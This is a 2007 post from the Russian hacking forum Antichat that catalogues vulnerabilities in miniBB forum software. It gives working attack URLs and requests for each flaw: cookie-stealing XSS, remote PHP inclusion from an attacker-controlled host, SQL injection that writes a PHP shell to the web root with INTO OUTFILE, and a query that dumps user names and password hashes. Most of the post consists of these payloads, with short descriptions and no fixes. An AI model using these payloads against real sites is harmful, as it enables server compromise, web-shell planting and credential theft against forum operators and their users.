ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

[ Обзор уязвимостей miniBB ]
  #1  
Старый 06.11.2007, 16:30
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию [ Обзор уязвимостей miniBB ]

Обзор уязвимостей в miniBB


1. XSS miniBB<=1.7
Уязвимость в проверке правильности входных данных. Удаленный пользователь может выполнить XSS нападение.
Код:
http://[site]"></a><script> somejavascriptcode</script>
http://[site]"></a><script> alert(document.cookie)</script>
2. Удаленное выполнение произвольного php кода (php-инклуд) в MiniBB<=1.7
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
Код:
http://[target]/[path_to_minibb]/index.php? includeFooter=http://[attacker]
http://[target]/[path_to_minibb]/bb_admin.php? includeFooter=ht tp://[attacker]
3.SQL-inj в miniBB 2.0 RC6a, возможно более ранние версии.
a) Уязвимость существует из-за недостаточной обработки входных данных в параметрах confirmCode и post в сценарии index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Код:
http://[target]/[path_to_minibb]/index.php?action=confirmpasswd&confirmCode=f' union select '' from mysql.user INTO OUTFILE 
'/var/www/html/shell.php'/*
http://[target]/[path_to_minibb]/index.php?action=delmsg&post=1' union select 1,1 from mysql.user INTO OUTFILE '/tmp/passwd'/*
http://[target]/[path_to_minibb]/index.php?action=editmsg&post=1' union select 1,1 from mysql.user INTO OUTFILE '/tmp/passwd'/*
б) Уязвимость существует из-за недостаточной обработки входных данных в параметрах “user_usr”, “email” и “login”. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
user_usr=f' union select '','123' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/*
http://[target]/[path_to_minibb]/index.php?action=sendpass&email=f' union select 0,0,'' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/*
http://[target]/[path_to_minibb]/index.php?action=registernew&login||email=1' union select 1 from mysql.user INTO OUTFILE '/tmp/passwd'/*
в) Уязвимость существует из-за недостаточной обработки входных данных в параметре “queryStr”. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Код:
POST /index.php?sortBy=1 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: minibb.local:80
Content-Length: 91
Connection: Close

user_usr=1&user_pwd=1&mode=login&queryStr=">&pagetype=index
4.Удаленное выполнение произвольного php кода (php-инклуд) в miniBB<=2.02
а) Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "pathToFiles" сценарием bb_func_txt.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Код:
http://site/bb_func_txt.php?pathToFiles=$shell
б) Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "pathToFiles" в сценарии index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Код:
http://www.example.com/[Script_Path]/index.php?pathToFiles=Shell.txt?
5.Удаленное выполнение произвольного php кода (php-инклуд) в miniBB<=2.05
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в поле language. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит: http://www.xakep.ru/post/38631/MiniBB-Forum-Remote-Exploit.txt

6.SQL-inj в miniBB<=2.1, возможно более ранние версии.
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «table» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
http://site/index.php?action=search&where=3 &searchGo=1& table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username, 0x20,user_password))/**/FROM/**/minibbtable_users/* */WHERE/**/user_id=1/*
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
форумные движки: обзор и обсуждение nerezus ПО для Web разработчика 61 29.04.2010 10:08
Статья обзор уязвимостей бесплатных почтовых сервисов markel E-Mail 3 12.09.2005 10:07
Обзор рынка взломщиков электронной почты, март2004 Игорь Белкин E-Mail 5 25.03.2004 12:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ